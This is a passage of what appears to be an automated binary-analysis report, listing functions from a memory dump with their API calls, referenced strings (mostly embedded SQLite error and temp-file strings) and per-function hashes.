                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04202C00, Relevance: 23.1, APIs: 6, Strings: 7, Instructions: 366COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
                                                                    • API String ID: 2102423945-1989508764
                                                                    • Opcode ID: 3d1c3ca6aa0464c943813607c563dbc1a1638a094e1fd6c6c00534f95dca254e
                                                                    • Instruction ID: b9d25929b554efc3562dfd0dffe829e3da27985035ce0c667aa888188f489d41
                                                                    • Opcode Fuzzy Hash: 3d1c3ca6aa0464c943813607c563dbc1a1638a094e1fd6c6c00534f95dca254e
                                                                    • Instruction Fuzzy Hash: 62C128B5B28341EBE710DA14DC84B2B77E5EF84708F048599F9865B2C7F670B940CBA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 042080B0, Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 299fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • %s-shm, xrefs: 04208159
                                                                    • ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 04208229
                                                                    • cannot open file at line %d of [%.10s], xrefs: 04208233
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ErrorFileLastUnlock_memset
                                                                    • String ID: %s-shm$cannot open file at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                                    • API String ID: 4009513553-3592428516
                                                                    • Opcode ID: 21a92cb10f47d001e4d64c6706dff4c99b1b7c93b1284c8fa00a01052b746367
                                                                    • Instruction ID: 97690524b6f25f89dc14e9605e5a513d1e83ea9cc3dc25a16e879eb28850300e
                                                                    • Opcode Fuzzy Hash: 21a92cb10f47d001e4d64c6706dff4c99b1b7c93b1284c8fa00a01052b746367
                                                                    • Instruction Fuzzy Hash: F8B12AB1724301AFE750EF29E845B17BBE4AF88718F04852DE949D7282EB74F9448B52
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04209020, Relevance: 16.6, APIs: 11, Instructions: 127sleepfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetVersionExW.KERNEL32(?,00000000,00000000,7519F560), ref: 04209068
                                                                      • Part of subcall function 04207760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000114,75145420,0420908D,00000000,00000000,7519F560), ref: 04207770
                                                                      • Part of subcall function 04207760: _malloc.LIBCMT ref: 0420777C
                                                                      • Part of subcall function 04207760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 04207796
                                                                      • Part of subcall function 04207760: _free.LIBCMT ref: 042077A1
                                                                    • GetVersionExW.KERNEL32(?,00000000,00000000,7519F560), ref: 042090BD
                                                                    • DeleteFileW.KERNEL32(00000000,00000000,00000000,7519F560), ref: 042090E1
                                                                    • GetFileAttributesW.KERNEL32(00000000), ref: 042090E4
                                                                    • GetLastError.KERNEL32 ref: 042090F1
                                                                    • Sleep.KERNEL32(00000064), ref: 04209116
                                                                    • DeleteFileA.KERNEL32(00000000,00000000,00000000,7519F560), ref: 04209125
                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 04209128
                                                                    • GetLastError.KERNEL32 ref: 04209135
                                                                    • Sleep.KERNEL32(00000064), ref: 0420915A
                                                                    • _free.LIBCMT ref: 04209163
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: File$AttributesByteCharDeleteErrorLastMultiSleepVersionWide_free$_malloc
                                                                    • String ID:
                                                                    • API String ID: 876893172-0
                                                                    • Opcode ID: c45013e5b27b2b055d7f46e18cb64cfc6e2ed77ed440daf8006d87beb2504d0e
                                                                    • Instruction ID: 7318dd65bc2d4fed506f3c64b911bc61a5379463056ec21328ff104e4856ddb4
                                                                    • Opcode Fuzzy Hash: c45013e5b27b2b055d7f46e18cb64cfc6e2ed77ed440daf8006d87beb2504d0e
                                                                    • Instruction Fuzzy Hash: 9F416071B102299BCB20AF78A88D69EB3F5FB48324F1145A9D51BD3182D7386E84CF51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0421BCB0, Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 311COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0421BDBC
                                                                      • Part of subcall function 0420D4E0: _memset.LIBCMT ref: 0420D514
                                                                    Strings
                                                                    • 2nd reference to page %d, xrefs: 0421BFF0
                                                                    • failed to get page %d, xrefs: 0421C032
                                                                    • %d of %d pages missing from overflow list starting at %d, xrefs: 0421C018
                                                                    • database corruption at line %d of [%.10s], xrefs: 0421BDD0
                                                                    • ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 0421BDC6
                                                                    • invalid page number %d, xrefs: 0421BFD6
                                                                    • freelist leaf count too big on page %d, xrefs: 0421BEB6
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: %d of %d pages missing from overflow list starting at %d$2nd reference to page %d$database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7$failed to get page %d$freelist leaf count too big on page %d$invalid page number %d
                                                                    • API String ID: 2102423945-881679150
                                                                    • Opcode ID: d3165e5c9447d90f712f5b1ecddb5acf527cdb99e559b4b5d079ef7194a77f50
                                                                    • Instruction ID: 02418e30693cde0a2a5a32b762f0c4833163a29c2b6e6291f417a78aa7b7d317
                                                                    • Opcode Fuzzy Hash: d3165e5c9447d90f712f5b1ecddb5acf527cdb99e559b4b5d079ef7194a77f50
                                                                    • Instruction Fuzzy Hash: 80B11F71B242169FEB14CF18C880A6ABBF1EF99314F088159FC588B252C371F951CBE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04208970, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 212COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetVersionExW.KERNEL32(?,?,00000008), ref: 042089C7
                                                                    • GetTempPathW.KERNEL32(000000E6,?,?,00000008), ref: 042089F0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: PathTempVersion
                                                                    • String ID: %s\etilqs_$etilqs_
                                                                    • API String ID: 261301950-1420421710
                                                                    • Opcode ID: 4b8c100a63598465804fe18c9ace23844d818d571cc553eb9904a266706fe711
                                                                    • Instruction ID: 1f955d5f578b1eefb7382a5eb1bdf418825384e9e3f3a76ff7ea21ec6191da41
                                                                    • Opcode Fuzzy Hash: 4b8c100a63598465804fe18c9ace23844d818d571cc553eb9904a266706fe711
                                                                    • Instruction Fuzzy Hash: 2C715A71B1425A9FE721EB399C44BBB7BE0AF09304F0482E9D455861C3D676AA85CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04207C80, Relevance: 12.1, APIs: 8, Instructions: 140filesleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 04207CD4
                                                                    • Sleep.KERNEL32(00000001), ref: 04207CE2
                                                                    • GetLastError.KERNEL32 ref: 04207CF2
                                                                    • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 04207D33
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: File$ErrorLastLockSleepUnlock
                                                                    • String ID:
                                                                    • API String ID: 3015003838-0
                                                                    • Opcode ID: 5457b762ff31a1e0f124027a12d07fba3cba278589f9d1dfa7786447d0cc7c4c
                                                                    • Instruction ID: af3572fe937014fab06db9f9edc1f23824848cc304f518d7876dfb3c3b356def
                                                                    • Opcode Fuzzy Hash: 5457b762ff31a1e0f124027a12d07fba3cba278589f9d1dfa7786447d0cc7c4c
                                                                    • Instruction Fuzzy Hash: FA418175B21216ABDB218E18E4947BA7BE4EBC4724F24C556ED08DF382D375BD4087D0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 042091B0, Relevance: 10.6, APIs: 7, Instructions: 137COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetVersionExW.KERNEL32(?), ref: 042091FD
                                                                      • Part of subcall function 04207760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000114,75145420,0420908D,00000000,00000000,7519F560), ref: 04207770
                                                                      • Part of subcall function 04207760: _malloc.LIBCMT ref: 0420777C
                                                                      • Part of subcall function 04207760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 04207796
                                                                      • Part of subcall function 04207760: _free.LIBCMT ref: 042077A1
                                                                    • GetVersionExW.KERNEL32(?), ref: 04209252
                                                                    • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 04209292
                                                                    • _free.LIBCMT ref: 042092E8
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ByteCharMultiVersionWide_free$AttributesFile_malloc
                                                                    • String ID:
                                                                    • API String ID: 2391428990-0
                                                                    • Opcode ID: 11f4f2965b4cc378b0a6c152a9431c6f7c7a86fc2a1c2d2872ab52d565cafc2b
                                                                    • Instruction ID: 84c6615b13cf35141f180c845e3045780554eb3fecc333da1ebc771788b0e52d
                                                                    • Opcode Fuzzy Hash: 11f4f2965b4cc378b0a6c152a9431c6f7c7a86fc2a1c2d2872ab52d565cafc2b
                                                                    • Instruction Fuzzy Hash: 0C4136B1F102199FDB10DF69D9846EEB7F4FB49315F1041AAD80AE3282EB746984CF54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04208500, Relevance: 9.2, APIs: 6, Instructions: 195fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 042085AB
                                                                    • GetLastError.KERNEL32 ref: 042085D6
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ErrorFileLastUnlock
                                                                    • String ID:
                                                                    • API String ID: 3655728120-0
                                                                    • Opcode ID: 538afc4435abf1823a4019fd101ae8c6746db82c0b9aeb1e6a2f5bcd33f2a6b7
                                                                    • Instruction ID: 6649d1ac87b81865a4566a40d93b8af60147be610118bf1139cbc64cd14fb04e
                                                                    • Opcode Fuzzy Hash: 538afc4435abf1823a4019fd101ae8c6746db82c0b9aeb1e6a2f5bcd33f2a6b7
                                                                    • Instruction Fuzzy Hash: 54713475B102069FDB50DF69C884AABBBF5FF48354F16C469E809DB281E774EA01CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04208780, Relevance: 9.2, APIs: 6, Instructions: 164fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetFileSize.KERNEL32(?,00000000), ref: 042087EB
                                                                    • GetLastError.KERNEL32 ref: 042087F8
                                                                    • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 042088B4
                                                                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 042088DC
                                                                    • GetLastError.KERNEL32 ref: 04208906
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0420891C
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: File$ErrorLast$CloseCreateHandleMappingSizeView
                                                                    • String ID:
                                                                    • API String ID: 1258392467-0
                                                                    • Opcode ID: 561a58677ed1450e135dd7351f647c13283a5954fecf103f1b6eb694f3b24265
                                                                    • Instruction ID: 9572607bd42e1b1f37b02b1308cbeb731dd25039e4a07fff77394d4bda84ca32
                                                                    • Opcode Fuzzy Hash: 561a58677ed1450e135dd7351f647c13283a5954fecf103f1b6eb694f3b24265
                                                                    • Instruction Fuzzy Hash: 325139B07107068BD764EF29D984A1BB7E9FF84314F04892DE98287782E770F914CB96
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04266E64, Relevance: 9.1, APIs: 6, Instructions: 98COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __lock.LIBCMT ref: 04266E72
                                                                      • Part of subcall function 0426923C: __mtinitlocknum.LIBCMT ref: 04269252
                                                                      • Part of subcall function 0426923C: __amsg_exit.LIBCMT ref: 0426925E
                                                                      • Part of subcall function 0426923C: EnterCriticalSection.KERNEL32(00000000,00000000,?,04267AC4,00000006,042794A0,00000008,0426655B,00000000,?,?,000003E8,00000000), ref: 04269266
                                                                    • DecodePointer.KERNEL32(04279460,00000020,04266FB5,00000008,00000001,00000000,?,04266FE6,000000FF,?,04269263,00000011,00000000,?,04267AC4,00000006), ref: 04266EAE
                                                                    • DecodePointer.KERNEL32(?,04266FE6,000000FF,?,04269263,00000011,00000000,?,04267AC4,00000006), ref: 04266EBF
                                                                      • Part of subcall function 04267FF2: RtlEncodePointer.NTDLL(00000000,04269841,0427DD38,00000314,00000000,?,?,?,?,?,0426714A,0427DD38,Microsoft Visual C++ Runtime Library,00012010), ref: 04267FF4
                                                                    • DecodePointer.KERNEL32(-00000004,?,04266FE6,000000FF,?,04269263,00000011,00000000,?,04267AC4,00000006), ref: 04266EE5
                                                                    • DecodePointer.KERNEL32(?,04266FE6,000000FF,?,04269263,00000011,00000000,?,04267AC4,00000006), ref: 04266EF8
                                                                    • DecodePointer.KERNEL32(?,04266FE6,000000FF,?,04269263,00000011,00000000,?,04267AC4,00000006), ref: 04266F02
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                                    • String ID:
                                                                    • API String ID: 2005412495-0
                                                                    • Opcode ID: 760b3e7069f0e230f8eaf42a6b20c2fff4fb7cdfc4f9f1566ef6ecfc7a28e007
                                                                    • Instruction ID: 0debde70b8940d9804ef7a89c4a56d06f45cbfcca62df3d29410b131b1cd46f9
                                                                    • Opcode Fuzzy Hash: 760b3e7069f0e230f8eaf42a6b20c2fff4fb7cdfc4f9f1566ef6ecfc7a28e007
                                                                    • Instruction Fuzzy Hash: 85314871F2034ADFEF109FA9D88469DBBF4BF48315F10446EE412A6240CBB9A884CF65
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0426A43A, Relevance: 9.0, APIs: 6, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __getptd.LIBCMT ref: 0426A446
                                                                      • Part of subcall function 042681A5: __getptd_noexit.LIBCMT ref: 042681A8
                                                                      • Part of subcall function 042681A5: __amsg_exit.LIBCMT ref: 042681B5
                                                                    • __amsg_exit.LIBCMT ref: 0426A466
                                                                    • __lock.LIBCMT ref: 0426A476
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0426A493
                                                                    • _free.LIBCMT ref: 0426A4A6
                                                                    • InterlockedIncrement.KERNEL32(04411608), ref: 0426A4BE
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                    • String ID:
                                                                    • API String ID: 3470314060-0
                                                                    • Opcode ID: e398df9eaef3cbdf680f5735d8780f437283d6d4875996480d67e6fb4468a803
                                                                    • Instruction ID: ef1879b2427b7b0901dbf11758c83cdaab0436f453f838b05e386fe40f9e22d0
                                                                    • Opcode Fuzzy Hash: e398df9eaef3cbdf680f5735d8780f437283d6d4875996480d67e6fb4468a803
                                                                    • Instruction Fuzzy Hash: 72016172B226229BEB21BF69E84C75A7760AF05765F044115EC03B7A80CB38B9C1DFD1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0421D660, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                                    • API String ID: 0-1231421067
                                                                    • Opcode ID: feede2d9ea340201b6487b0b11623fa5481b480526c1d14db7de025015e1b358
                                                                    • Instruction ID: 6228e0456ecba04faf3161ec7732286bc4473a3d93122be81838e6af52e324e1
                                                                    • Opcode Fuzzy Hash: feede2d9ea340201b6487b0b11623fa5481b480526c1d14db7de025015e1b358
                                                                    • Instruction Fuzzy Hash: 41817BB1B24301DFD310DF19C880A1AB7E5AF98318F158A6DF9889B361D371F846CB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04207FD0, Relevance: 7.6, APIs: 5, Instructions: 82filesleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • UnmapViewOfFile.KERNEL32(0427EAE8), ref: 0420801B
                                                                    • CloseHandle.KERNEL32(00000000), ref: 04208028
                                                                    • CloseHandle.KERNEL32(?), ref: 0420803C
                                                                    • Sleep.KERNEL32(00000064), ref: 0420804A
                                                                    • CloseHandle.KERNEL32(?), ref: 04208054
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: CloseHandle$FileSleepUnmapView
                                                                    • String ID:
                                                                    • API String ID: 888976869-0
                                                                    • Opcode ID: 9c135d284c35ae719d3098b68f2d3e6030bd3b4cfb83848fbe444940df6f9720
                                                                    • Instruction ID: af4af9ade239dc2dc15cf464b1a13d1b82992cc1ca513dc9639822728f2da3ed
                                                                    • Opcode Fuzzy Hash: 9c135d284c35ae719d3098b68f2d3e6030bd3b4cfb83848fbe444940df6f9720
                                                                    • Instruction Fuzzy Hash: 8621BC75B20701EBD730EF68D984A2B73EAFF84314B018618E98257682C734FC45CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 042078D0, Relevance: 7.6, APIs: 5, Instructions: 72fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 042078F8
                                                                    • GetLastError.KERNEL32 ref: 04207909
                                                                    • GetLastError.KERNEL32 ref: 0420790F
                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0420792C
                                                                    • GetLastError.KERNEL32 ref: 04207952
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ErrorLast$File$PointerWrite
                                                                    • String ID:
                                                                    • API String ID: 3440492293-0
                                                                    • Opcode ID: 8e5ce4d6ef6a8690bbedd2de226cf4fec3ab2b406fb31a74f492e53c4b85827d
                                                                    • Instruction ID: d8b4f072e3aae7cb349dcfabd0c3d7613f50300e8bffc5774ded8da468940885
                                                                    • Opcode Fuzzy Hash: 8e5ce4d6ef6a8690bbedd2de226cf4fec3ab2b406fb31a74f492e53c4b85827d
                                                                    • Instruction Fuzzy Hash: 0611AF3271021EABDB20CE68DC44E9A77E8FB84660B148628FD18CB2C1D634FD008BE4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 042096B0, Relevance: 7.6, APIs: 5, Instructions: 72libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetVersionExW.KERNEL32(?), ref: 042096E9
                                                                      • Part of subcall function 04207760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000114,75145420,0420908D,00000000,00000000,7519F560), ref: 04207770
                                                                      • Part of subcall function 04207760: _malloc.LIBCMT ref: 0420777C
                                                                      • Part of subcall function 04207760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 04207796
                                                                      • Part of subcall function 04207760: _free.LIBCMT ref: 042077A1
                                                                    • GetVersionExW.KERNEL32(?), ref: 0420973F
                                                                    • LoadLibraryW.KERNEL32(00000000), ref: 04209759
                                                                    • LoadLibraryA.KERNEL32(00000000), ref: 04209761
                                                                    • _free.LIBCMT ref: 0420976A
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ByteCharLibraryLoadMultiVersionWide_free$_malloc
                                                                    • String ID:
                                                                    • API String ID: 878107876-0
                                                                    • Opcode ID: 1f663d2726d935f0317942be2bcecdc487cf5c909b3595e5b9b50b0c5a3a5c71
                                                                    • Instruction ID: 23c5045c80b6be520f6c012153082cc4835eaae42f654f1ab39de800d8111e00
                                                                    • Opcode Fuzzy Hash: 1f663d2726d935f0317942be2bcecdc487cf5c909b3595e5b9b50b0c5a3a5c71
                                                                    • Instruction Fuzzy Hash: 2E217872B101199FDB14DF79B949A9E73E4FB44368F1084E9D50AC3181DA34AD85CF61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04207980, Relevance: 7.6, APIs: 5, Instructions: 70fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 042079AB
                                                                    • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 042079DC
                                                                    • GetLastError.KERNEL32 ref: 042079ED
                                                                    • GetLastError.KERNEL32 ref: 042079F3
                                                                    • SetEndOfFile.KERNEL32(?), ref: 04207A08
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ErrorFileLast$PointerUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID:
                                                                    • API String ID: 1588551569-0
                                                                    • Opcode ID: 785bc14a01cf8a68a7152d528079e11be4c3803dd57fadb8d704bd12611604cc
                                                                    • Instruction ID: 7857e2d6748185bf851897fef287cbe902a5b9aa071f959147ed5630f3108830
                                                                    • Opcode Fuzzy Hash: 785bc14a01cf8a68a7152d528079e11be4c3803dd57fadb8d704bd12611604cc
                                                                    • Instruction Fuzzy Hash: F51160B67102065BDB14CE69DC85EAB7799FBC9230B048769FD29C72C1DA34E80086B4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04266757, Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _malloc.LIBCMT ref: 04266765
                                                                      • Part of subcall function 0426643B: __FF_MSGBANNER.LIBCMT ref: 04266454
                                                                      • Part of subcall function 0426643B: __NMSG_WRITE.LIBCMT ref: 0426645B
                                                                      • Part of subcall function 0426643B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,042684E8,00000008,00000001,00000008,?,042691C7,00000018,04279530,0000000C,04269257), ref: 04266480
                                                                    • _free.LIBCMT ref: 04266778
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: AllocateHeap_free_malloc
                                                                    • String ID:
                                                                    • API String ID: 1020059152-0
                                                                    • Opcode ID: 98c23498d743af94fddd281dab7fab4dab501d38634de832efc3365ecbd0a768
                                                                    • Instruction ID: bbb105dbb30b2467dfc855395c2a8f69db1a0a208b030f9a9ccb73976e1db1bd
                                                                    • Opcode Fuzzy Hash: 98c23498d743af94fddd281dab7fab4dab501d38634de832efc3365ecbd0a768
                                                                    • Instruction Fuzzy Hash: 6A118D327346169BEB232F74B8087693795FF80278F244569F85BDA180EE75B8C1C794
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 042076F0, Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • AreFileApisANSI.KERNEL32 ref: 042076F6
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 04207712
                                                                    • _malloc.LIBCMT ref: 0420771B
                                                                      • Part of subcall function 0426643B: __FF_MSGBANNER.LIBCMT ref: 04266454
                                                                      • Part of subcall function 0426643B: __NMSG_WRITE.LIBCMT ref: 0426645B
                                                                      • Part of subcall function 0426643B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,042684E8,00000008,00000001,00000008,?,042691C7,00000018,04279530,0000000C,04269257), ref: 04266480
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 0420773D
                                                                    • _free.LIBCMT ref: 04207748
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$AllocateApisFileHeap_free_malloc
                                                                    • String ID:
                                                                    • API String ID: 2559239037-0
                                                                    • Opcode ID: 253c3e3b07f7976bb0a1c27bdfd04929b192409c01cbbfc27cbafa8955fe3855
                                                                    • Instruction ID: 32ffd88a4e3e04fa7593aec782407b0f534d0c0e8ca5df331e2fb9e5f209d56e
                                                                    • Opcode Fuzzy Hash: 253c3e3b07f7976bb0a1c27bdfd04929b192409c01cbbfc27cbafa8955fe3855
                                                                    • Instruction Fuzzy Hash: A8F09C763402143BF6105659BC49FBB765CDBC1AB9F200225FF19D61C0D9A57D0681A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04207680, Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • AreFileApisANSI.KERNEL32 ref: 04207686
                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000), ref: 0420769E
                                                                    • _malloc.LIBCMT ref: 042076AC
                                                                      • Part of subcall function 0426643B: __FF_MSGBANNER.LIBCMT ref: 04266454
                                                                      • Part of subcall function 0426643B: __NMSG_WRITE.LIBCMT ref: 0426645B
                                                                      • Part of subcall function 0426643B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,042684E8,00000008,00000001,00000008,?,042691C7,00000018,04279530,0000000C,04269257), ref: 04266480
                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000), ref: 042076CA
                                                                    • _free.LIBCMT ref: 042076D5
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$AllocateApisFileHeap_free_malloc
                                                                    • String ID:
                                                                    • API String ID: 2559239037-0
                                                                    • Opcode ID: b1e3704395040d8085104dc6be3d49e44be52c8d257b72d829bde5176d0f4072
                                                                    • Instruction ID: 08741cbe6dcb31f3dabd98105b23e8b5d8efd42d3b9dadfd72a4f05a98bbce9c
                                                                    • Opcode Fuzzy Hash: b1e3704395040d8085104dc6be3d49e44be52c8d257b72d829bde5176d0f4072
                                                                    • Instruction Fuzzy Hash: 0DF0FC723451153BF7106AADBC84FFB379CEB8167CF100335FE1A861C0EAA9AD4581A0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 04207760, Relevance: 7.5, APIs: 5, Instructions: 42COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000114,75145420,0420908D,00000000,00000000,7519F560), ref: 04207770
                                                                    • _malloc.LIBCMT ref: 0420777C
                                                                      • Part of subcall function 0426643B: __FF_MSGBANNER.LIBCMT ref: 04266454
                                                                      • Part of subcall function 0426643B: __NMSG_WRITE.LIBCMT ref: 0426645B
                                                                      • Part of subcall function 0426643B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,042684E8,00000008,00000001,00000008,?,042691C7,00000018,04279530,0000000C,04269257), ref: 04266480
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 04207796
                                                                    • _free.LIBCMT ref: 042077A1
                                                                      • Part of subcall function 04266401: HeapFree.KERNEL32(00000000,00000000,?,04268196,00000000,?,042684E8,00000008,00000001,00000008,?,042691C7,00000018,04279530,0000000C,04269257), ref: 04266417
